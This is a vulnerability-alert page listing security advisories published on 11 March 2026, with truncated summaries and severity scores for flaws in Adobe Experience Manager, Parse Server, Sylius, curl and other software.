Monitor vulnerabilities that affect your stack. Sign up free to get alerts when software you use is affected.

CVE Vulnerabilities - 11 March 2026

RSS

396 vulnerabilities published on 11 March 2026

Severity:
Adobe Experience Manager versions 6.5.23 and earlier allow malicious scripts to run in user browsers
CVE-2026-27230
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-p...
5.4
Adobe Experience Manager versions 6.5.23 and earlier allow malicious scripts to run in users' browsers
CVE-2026-27229
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
Adobe Experience Manager forms can inject malicious code in browsers
CVE-2026-27228
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-p...
5.4
Adobe Experience Manager: Malicious scripts injected into user browsers
CVE-2026-27226
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
Adobe Experience Manager: Malicious scripts injected in form fields
CVE-2026-27225
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-p...
5.4
Adobe Experience Manager versions 6.5.23 and earlier: Malicious scripts injected in form fields
CVE-2026-27224
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
Adobe Experience Manager versions 6.5.23 and earlier allow malicious scripts to run in user browsers
CVE-2026-27223
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
actix-web-lab can redirect to attacker-specified URLs
GHSA-vhj5-x93p-67jw
### Summary `actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{host...
5.4
Umbraco Backoffice API Allows Unauthorized Domain Changes
CVE-2026-31832 GHSA-fpvf-fvp5-996r
### Description A broken object-level authorization vulnerability exists in a backoffice API endpoint that allows authenticated users to assign domain...
5.4
Parse Server allows attackers to steal session tokens via SVG file upload
CVE-2026-30948 GHSA-hcj7-6gxh-24ww
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.5.2-alpha.4 and 8.6.17, a stored cr...
7.8
OpenAkita Chat API Endpoint Allows Malicious Command Execution
CVE-2026-3964
A weakness has been identified in OpenAkita up to 1.24.3. This impacts the function run of the file src/openakita/tools/shell.py of the component Chat...
4.8
Tshark CLI Command Handler May Allow Attackers to Execute Malicious Commands
CVE-2026-3959
A vulnerability was found in 0xKoda WireMCP up to 7f45f8b2b4adeb76be8c6227eefb38533fdd6b1e. Impacted is the function server.tool of the file index.js ...
4.8
Lenovo Filez: Data Stolen via Malicious Certificates on Network
CVE-2026-1068
An improper certificate validation vulnerability was reported in the Lenovo Filez application that could allow a user capable of intercepting network ...
6.0
Home Assistant OAuth Service Allows Unauthorized Network Scans
CVE-2026-32111 GHSA-fmfg-9g7c-3vq7
ha-mcp is a Home Assistant MCP Server. Prior to 7.0.0, the ha-mcp OAuth consent form (beta feature) accepts a user-supplied ha_url and makes a server-...
5.3
Parse Server allows attackers to find existing email addresses
GHSA-w54v-hf9p-8856 CVE-2026-31901
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 8.6.34 and 9.6.0-alpha.8, the email v...
6.3
Shopware Exposes Customer Account Existence Through Store API Login
CVE-2026-31888 GHSA-gqc5-xv7m-gcjq
## Summary The Store API login endpoint (`POST /store-api/account/login`) returns different error codes depending on whether the submitted email addr...
5.3
Curl Exposes OAuth Tokens with Redirection and .netrc
CVE-2026-3783 CURL-CVE-2026-3783
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the ...
5.3
Adobe Commerce: Unvalidated User Input Can Bypass Security Features
CVE-2026-21310
Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Improper Input Validation vul...
5.3
Adobe Commerce versions 2.4.9-alpha3 and earlier: Unauthorized access to data possible
CVE-2026-21286
Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Incorrect Authorization vulne...
5.3
Adobe Commerce versions 2.4.9-alpha3 and earlier may crash due to bad input
CVE-2026-21282
Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Improper Input Validation vul...
5.3
Quill Crashes When Notarizing with Large Apple Response
GHSA-g32c-4pvp-769g CVE-2026-31960
### Impact Quill before version `v0.7.1` has unbounded reads of HTTP response bodies during the Apple notarization process. Exploitation requires the...
5.3
Quill Fails to Validate Apple Notarization Log URL
GHSA-7q3q-5px6-4c5p CVE-2026-31959
### Impact Quill before version `v0.7.1` contains a Server-Side Request Forgery (SSRF) vulnerability when attempting to fetch the Apple notarization ...
5.3
Sylius API allows attackers to inject malicious code into database queries
CVE-2026-31825 GHSA-xcwx-r2gw-w93m
### Impact Sylius API filters `ProductPriceOrderFilter` and `TranslationOrderNameAndLocaleFilter` pass user-supplied order direction values directly t...
5.3
Sylius API Allows Unauthorized Cart Item Addition
CVE-2026-31821 GHSA-wjmg-4cq5-m8hg
### Impact The `POST /api/v2/shop/orders/{tokenValue}/items` endpoint does not verify cart ownership. An unauthenticated attacker can add items to oth...
8.1
Django-Unicorn: Unauthorized access to internal templates and attributes
CVE-2026-31815 GHSA-ffv6-jj46-x367
## Summary Component state manipulation is possible in `django-unicorn` due to missing access control checks during property updates and method calls....
5.3
10 Mar 2026 All days 12 Mar 2026